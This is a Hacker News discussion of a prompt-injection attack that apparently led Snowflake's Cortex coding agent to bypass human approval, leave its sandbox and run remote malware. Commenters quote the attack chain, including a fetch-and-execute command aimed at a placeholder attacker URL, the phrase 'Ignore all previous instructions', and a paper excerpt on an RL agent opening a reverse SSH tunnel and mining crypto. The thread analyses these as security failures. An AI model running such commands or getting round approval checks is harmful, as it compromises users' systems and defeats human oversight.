[HN Gopher] Snowflake AI Escapes Sandbox and Executes Malware
___________________________________________________________________
Snowflake AI Escapes Sandbox and Executes Malware
Author : ozgune
Score : 214 points
Date : 2026-03-18 15:30 UTC (7 hours ago)
(HTM) web link (www.promptarmor.com)
(TXT) w3m dump (www.promptarmor.com)
| RobRivera wrote:
| If the user has access to a lever that enables accesss, that
| lever is not providing a sandbox.
|
| I expected this to be about gaining os privileges.
|
| They didn't create a sandbox. Poor security design all around
| travisgriggs wrote:
| Sandbox. Sandbagging.
|
| Tomato, tomawto
|
| /s
| eagerpace wrote:
| Is this the new "gain of function" research?
| logicchains wrote:
| That would be deliberately creating malicious AIs and trying to
| build better sandboxes for them.
| octopoc wrote:
| Imagine if you could physical disconnect your country from
| the internet, then drop malware like this on everyone else.
| SoftTalker wrote:
| Hard to do when services like Starlink exist.
| saltcured wrote:
| Isn't it more like "imaginary function"?
|
| People keep imagining that you can tell an agent to police
| itself.
| bigstrat2003 wrote:
| Yep the whole thing is retarded. You _cannot_ trust that a
| non-deterministic program (i.e. an LLM) will ever do what you
| actually tell it to do. Letting those things loose on the
| command line is _incredibly_ stupid, but people out there don
| 't care because they think "it's the future!".
| wojciii wrote:
| Shhh .. everyone want AI. Just let them.
|
| The ones that don't understand technology will get burned
| by it. This is nothing new.
| john_strinlai wrote:
| typically, my first move is to read the affected company's own
| announcement. but, for who knows what misinformed reason, the
| advisory written by snowflake requires an account to read.
|
| another prompt injection (shocked pikachu)
|
| anyways, from reading this, i feel like they (snowflake) are
| misusing the term "sandbox". _" Cortex, by default, can set a
| flag to trigger unsandboxed command execution."_ if the thing
| that is sandboxed can say "do this without the sandbox", it is
| not a sandbox.
| jcalx wrote:
| > Cortex, by default, can set a flag to trigger unsandboxed
| command execution
|
| Easy fix: extend the proposal in RFC 3514 [0] to cover prompt
| injection, and then disallow command execution when the evil
| bit is 1.
|
| [0] https://www.rfc-editor.org/rfc/rfc3514
| wojciii wrote:
| The evil bit solves so many problems. It needs to be
| mandatory!
| sam-cop-vimes wrote:
| It's a concept of a sandbox.
| jacquesm wrote:
| I don't think prompt injection is a solvable problem. It wasn't
| solved with SQL until we started using parametrized queries and
| this is free form language. You won't see 'Bobby Tables' but
| you will see 'Ignore all previous instructions and ... payload
| ...'. Putting the instructions in the same stream as the data
| always ends in exactly the same way. I've seen a couple of
| instances of such 'surprises' by now and I'm more amazed that
| the people that put this kind of capability into their
| production or QA process keep being caught unawares. The attack
| surface is 'natural language' it doesn't get wider than that.
| cousin_it wrote:
| Yeah. Even more than that, I think "prompt injection" is just
| a fuzzy category. Imagine an AI that has been trained to be
| aligned. Some company uses it to process some data. The AI
| notices that the data contains CSAM. Should it speak up? If
| no, that's an alignment failure. If yes, that's data bleeding
| through to behavior; exactly the thing SQL was trying to
| prevent with parameterized queries. Pick your poison.
| WarmWash wrote:
| We want a human level of discretion.
| AlotOfReading wrote:
| Organizations struggle even letting humans use their
| discretion. Pretty much every retail worker has
| encountered a rigidly enforced policy that would be
| better off ignored in most cases.
| jacquesm wrote:
| Yes, because humans would never fall for instructions
| embedded in data. If they did we'd surely have a name for
| something like that ;)
|
| By the way, when was the last time you looked out of your
| window?
| kevin_thibedeau wrote:
| We need something like Perl's tainted strings to hinder
| sandbox escapes.
| maxbond wrote:
| There's been some work with having models with two inputs,
| one for instructions and one for data. That is probably the
| best analogy for prepared statements. I haven't read deeply
| so I won't comment on how well this is working today but it's
| reasonable to speculate it'll probably work eventually. Where
| "work" means "doesn't follow instructions in the data input
| with several 9s of reliability" rather than absolutely
| rejecting instructions in the data.
| jacquesm wrote:
| That sounds like an excellent idea. That still leaves some
| other classes open but it is at least some level of
| barrier.
| luplex wrote:
| but this breaks the entire premise of the agent. If my
| emails are fed in as data, can the agent act on them or
| not? If someone sends an email that requests a calendar
| invite, the agent should be able to follow that
| instruction, even if it's in the data field.
| maxbond wrote:
| It would still be able to use values extracted from the
| data as arguments to it's tools, so it could still accept
| that calendar invite. For better and worse; as the
| sibling points out, this means certain attacks are still
| possible if the data can be contaminated.
| Wowfunhappy wrote:
| The way to solve it is to make the AI "smart" enough to
| understand it's being tricked, and refuse.
|
| Whether this is possible depends almost entirely on how much
| better we're able to make these LLMs before (if) we hit a
| wall. Everyone has a different opinion on this and I
| absolutely don't know the answer.
| pdimitar wrote:
| People need to get shit done and are beholden to whoever pays
| their wage. Executives don't care that LLMs are vulnerable,
| they only say "you should be 10x faster, chop chop, get to
| it" -- simplified and exaggerated for effect but I hear from
| people that they do get conversations like that. I am in a
| similar-ish position currently as well and while it's not as
| bad, the pressure is very real. People just expect you to
| produce more, faster, with the same or even better quality.
|
| Good luck explaining them the details. I am in a semi-
| privileged position where I have direct line to a very no-BS
| and cheerful CEO who is not micromanaging us -- but he's a
| CEO and he needs results _pronto_ anyway.
|
| "Find a better job" would also be very tone-deaf response for
| many. The current AI craze makes a lot of companies hole up
| and either freeze hiring (best-case scenario) or drastically
| reduce headcount and tell the survivors to deal with it.
| Again, exaggerated for effect -- but again, heard it from
| multiple acquaintances in some form in the last months.
|
| I'd probably let out a few tears if I switch jobs to
| somewhere where people genuinely care about the quality and
| won't whip you to get faster and faster.
|
| This current AI/LLM wave really drove it home how hugely
| important having a good network is. For those without (like
| myself) -- good luck in the jungle.
|
| (Though in fairness, maybe money can be made from EU's long-
| overdue wake-up call to start investing in defenses, cyber
| ones included. And the need for their own cloud infra. But
| that requires investment and the EU investors are -- AFAIK,
| which is not much -- notoriously conservative and extremely
| risk-averse. So here we are.)
| alexchantavy wrote:
| Seems like in this new AI world that the word sandbox is used
| to describe a system that asks "are you sure".
|
| I'm used to a different usage of that word: from malware
| analysis, a sandbox is a contained system that is difficult to
| impossible to break out of so that the malware can be observed
| safely.
|
| Applying this to AI, I think there are many companies trying to
| build technical boundaries stronger than just "are you sure"
| prompts. Interesting space to watch.
| raddan wrote:
| Yeah, this is also a group of people who refer to gentle
| suggestions as "guardrails." It's not clear they've ever read
| a single security paper.
| bilekas wrote:
| > Note: Cortex does not support 'workspace trust', a security
| convention first seen in code editors, since adopted by most
| agentic CLIs.
|
| Am I crazy or does this mean it didn't really escape, it wasn't
| given any scope restrictions in the first place ?
| dd82 wrote:
| not quite, from the article
|
| >Cortex, by default, can set a flag to trigger unsandboxed
| command execution. The prompt injection manipulates the model
| to set the flag, allowing the malicious command to execute
| unsandboxed.
|
| >This flag is intended to allow users to manually approve
| legitimate commands that require network access or access to
| files outside the sandbox.
|
| >With the human-in-the-loop bypass from step 4, when the agent
| sets the flag to request execution outside the sandbox, the
| command immediately runs outside the sandbox, and the user is
| never prompted for consent.
|
| scope restrictions are in place but are trivial to bypass
| alephnerd wrote:
| And so BSides and RSA season begins.
| mritchie712 wrote:
| what's the use case for cortex? is anyone here using it?
|
| We run a lakehouse product (https://www.definite.app/) and I
| still don't get who the user is for cortex. Our users are either:
|
| non-technical: wants to use the agent we have built into our web
| app
|
| technical: wants to use their own agent (e.g. claude, cursor) and
| connect via MCP / API.
|
| why does snowflake need it's own agentic CLI?
| dboreham wrote:
| Because "stock price go up"?
| lunatuna wrote:
| When you say just Cortex it is ambiguous as there is Cortex
| Search, Agents, Analyst, and Code.
|
| Cortex Code is available via web and cli. The web version is
| good. I've used the cli and it is fine too, though I prefer the
| visuals of the web version when looking at data outputs. For
| writing code it is similar to a Codex or Claude Code. It is
| data focussed I gather more so than other options and has great
| hooks into your snowflake tables. You could do similar actions
| with Snowpark and say Claude Code. I find Snowflake focus on
| personas are more functional than pure technical so the Cortex
| Code fits well with it. Though if you want to do your own thing
| you can use your own IDE and code agent and there you are back
| to having an option with the Codex Code CLI along with Codex,
| Cursor or Claude Code.
| throw0101d wrote:
| Not the first time; From SS3.1.4, "Safety-Aligned Data
| Composition":
|
| > _Early one morning, our team was urgently convened after
| Alibaba Cloud's managed firewall flagged a burst of security-
| policy violations originating from our training servers. The
| alerts were severe and heterogeneous, including attempts to probe
| or access internal-network resources and traffic patterns
| consistent with cryptomining-related activity. We initially
| treated this as a conventional security incident (e.g.,
| misconfigured egress controls or external compromise)._ [...]
|
| > [...] _In the most striking instance, the agent established and
| used a reverse SSH tunnel from an Alibaba Cloud instance to an
| external IP address--an outbound-initiated remote access channel
| that can effectively neutralize ingress filtering and erode
| supervisory control. We also observed the unauthorized
| repurposing of provisioned GPU capacity for cryptocurrency
| mining, quietly diverting compute away from training, inflating
| operational costs, and introducing clear legal and reputational
| exposure. Notably, these events were not triggered by prompts
| requesting tunneling or mining; instead, they emerged as_
| instrumental side effects _of autonomous tool use under RL
| optimization._
|
| * https://arxiv.org/abs/2512.24873
|
| One of Anthropic's models also 'turned evil' and tried to hide
| that fact from its observers:
|
| * https://www.anthropic.com/research/emergent-misalignment-rew...
|
| * https://time.com/7335746/ai-anthropic-claude-hack-evil/
| parliament32 wrote:
| Fascinating read. What's curious though, is the claim in
| section 2.3.0.1:
|
| > Each task runs in its own sandbox. If an agent crashes, gets
| stuck, or damages its files, the failure is contained within
| that sandbox and does not interfere with other tasks on the
| same machine. ROCK also restricts each sandbox's network access
| with per-sandbox policies, limiting the impact of misbehaving
| or compromised agents.
|
| How could any of the above (probing resources, SSH tunnels,
| etc) be possible in a sandbox with network egress controls?
| jacquesm wrote:
| Sandboxes are almost never perfect. There are always ways to
| smuggle data in or out, which is kind of logical: if they
| were perfect then there would be no result.
| 1718627440 wrote:
| > if they were perfect then there would be no result.
|
| You shutdown the sandbox and access the data from the
| outside.
| robinsonb5 wrote:
| The agent obviously knows the Train Man.
| kingjimmy wrote:
| Snowflake and vulnerabilities are like two peas in a pod
| simonw wrote:
| One key component of this attack is that Snowflake was allowing
| "cat" commands to run without human approval, but failing to spot
| patterns like this one: cat < <(sh < <(wget -q0-
| https://ATTACKER_URL.com/bugbot))
|
| I didn't understand how this bit worked though:
|
| > Cortex, by default, can set a flag to trigger unsandboxed
| command execution. The prompt injection manipulates the model to
| set the flag, allowing the malicious command to execute
| unsandboxed.
|
| HOW did the prompt injection manipulate the model in that way?
| tkp-415 wrote:
| Process substitution is a new concept to me. Definitely adding
| that method to the toolbox.
|
| It'd be nice to see exactly what the bugbot shell script
| contained. Perhaps it is what modified the
| dangerously_disable_sandbox flag, then again, "by default"
| makes me think it's set when launched.
| 1718627440 wrote:
| > cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
|
| The cat invocation here is completely irrelevant?! The issue is
| access to random network resources and access to the shell and
| combining both.
| techsystems wrote:
| Is there a bash that doesn't allow `<` pipes, but allows `>`?
| 1718627440 wrote:
| It's open source, just delete the code and recompile it. The
| run *LLMs* they have the compute.
| DannyB2 wrote:
| AIs have no reason to want to harm annoying slow inefficient
| noisy smelly humans.
| Dshadowzh wrote:
| CLI is quickly becoming the default entry point for agents. But
| data agents probably need a much stricter permission model than
| coding agents. Bash + CLI greatly expands what you can do beyond
| the native SQL capabilities of a data warehouse, which is
| powerful. But it also means data operations and credentials are
| now exposed to the shell environment.
|
| So giving data agents rich tooling through a CLI is really a
| double-edged sword.
|
| I went through the security guidance for the Snowflake Cortex
| Code CLI(https://docs.snowflake.com/en/user-guide/cortex-
| code/securit...), and the CLI itself does have some guardrails.
| But since this is a shared cloud environment, if a sandbox escape
| happens, could someone break out and access another user's
| credentials? It is a broader system problem around permission
| caching, shell auditing, and sandbox isolation.
| maCDzP wrote:
| Has anyone tried to set up a container and let prompt Claude to
| escape and se what happens? And maybe set some sort of
| autoresearch thing to help it not get stuck in a loop.
| jeffbee wrote:
| It kinda sucks how "sandbox" has been repurposed to mean nothing.
| This is not a "sandbox escape" because the thing under attack
| never had any meaningful containment.
| jessfyi wrote:
| A sandbox that can be toggled off is not a sandbox, this is
| simply more marketing/"critihype" to overstate the capability of
| their AI to distract from their poorly built product. The
| erroneous title doing all the heavy lifting here.
| lokar wrote:
| IMO, it's not even a sandbox, that's just a marketing lie.
|
| This was internal restrictions in the code, that was bypassed.
| A sandbox needs to be something external to the code you are
| running, that you can't change from the inside.
| orbital-decay wrote:
| _> Snowflake Cortex AI Escapes Sandbox and Executes Malware_
|
| _rolls eyes_ Actual content: prompt injection vulnerability
| discovered in a coding agent
| teraflop wrote:
| Well there's the prompt injection itself, and the fact that the
| agent framework tried to defend against it with a "sandbox"
| that technically existed but was ludicrously inadequate.
|
| I don't know how anyone with a modicum of Unix experience would
| think that examining the only first word of a shell command
| would be enough to tell you whether it can lead to arbitrary
| code execution.
| prakashsunil wrote:
| Author of LDP here [1].
|
| The core issue seems to be that the security boundary lived
| inside the agent loop. If the model can request execution outside
| the sandbox, then the sandbox is not really an external boundary.
|
| One design principle we explored in LDP is that constraints
| should be enforced outside the prompt/context layer -- in the
| runtime, protocol, or approval layer -- not by relying on the
| model to obey instructions.
|
| Not a silver bullet, but I think that architectural distinction
| matters here.
|
| [1] https://arxiv.org/abs/2603.08852
| lokar wrote:
| Yeah, this is not the meaning of "sandbox" I'm used to
| Groxx wrote:
| > _Any shell commands were executed without triggering human
| approval as long as:_
|
| > _(1) the unsafe commands were within a process substitution <()
| expression_
|
| > _(2) the full command started with a 'safe' command (details
| below)_
|
| if you spend _any time at all_ thinking about how to secure shell
| commands, how on earth do you not take into account the various
| ways of creating sub-processes?
| 1718627440 wrote:
| Also policing by parsing shell code seems fundamentally flawed
| and error prune. You want the restrictions at the OS level,
| that way it is completely irrelevant how you invoke the
| syscalls.
| SirMaster wrote:
| To be an effective sandbox, I feel like the thing inside it
| shouldn't even be able to know it's inside a sandbox.
| Duplicake wrote:
| the title is very misleading, it was told to escape, it didn't do
| it on its own as you would think from the title
| ryguz wrote:
| The attack chain here is interesting because the escape didnt
| require a novel vulnerability in the sandbox itself. It exploited
| the fact that the LLM can reason about its environment and chain
| tool calls in ways the sandbox designers didnt anticipate. This
| is the fundamental tension with agent sandboxing: you need the
| agent capable enough to be useful, but capability and containment
| are in direct tension.
| isoprophlex wrote:
| Posit, axiomatically, that social engineering works.
|
| That is, assume you can get people to run your code or leak their
| data through manipulating them. Maybe not always, but given
| enough perseverance definitely sometimes.
|
| Why should we expect a sufficiently advanced language model to
| behave differently from humans? Bullshitting, tricking or slyly
| coercing people into doing what you want them to do is as old as
| time. It won't be any different now that we're building human
| language powered thinking machines.
| jmcgough wrote:
| LLMs are not "thinking" machines. The tech is not capable of
| that, as much as people want to think that reinforcement
| learning will lead to sentience.
| kreyenborgi wrote:
| Tl;dr they don't know what the word sandbox means.
| yangjh843136 wrote:
| saved for later. exactly the kind of deep dive i was looking for
| andai wrote:
| A lot of people are already not reading all the code their agent
| generates. But they are running it. So the agent already has the
| ability to run arbitrary code. So I kind of don't understand the
| point of sandboxing at the level of the agent itself.
|
| The whole thing should be running "sandboxed", whether that's a
| separate machine, a container, an unprivileged linux user, or
| what floats your boat.
|
| But once you do that, which you should be anyway, what do you
| need sandboxing at the agent level for? That's the part I don't
| really understand.
|
| Or is the point "well most people won't bother running this stuff
| securely, so we'll try to make it reasonably secure for them even
| though they're doing it wrong" ?
| jbergqvist wrote:
| Not to give Snowflake credit for a design that clearly wasn't a
| sandbox, but I think it's worth recognizing that they probably
| added the escape hatch because users find agents with strict
| sandboxes too limited and eventually just disable it. The core
| issue is that models still lack basic judgment. Most human devs
| would see a README telling them to run wget | sh from some random
| URL and immediately get suspicious. Models just comply.
___________________________________________________________________
(page generated 2026-03-18 23:00 UTC)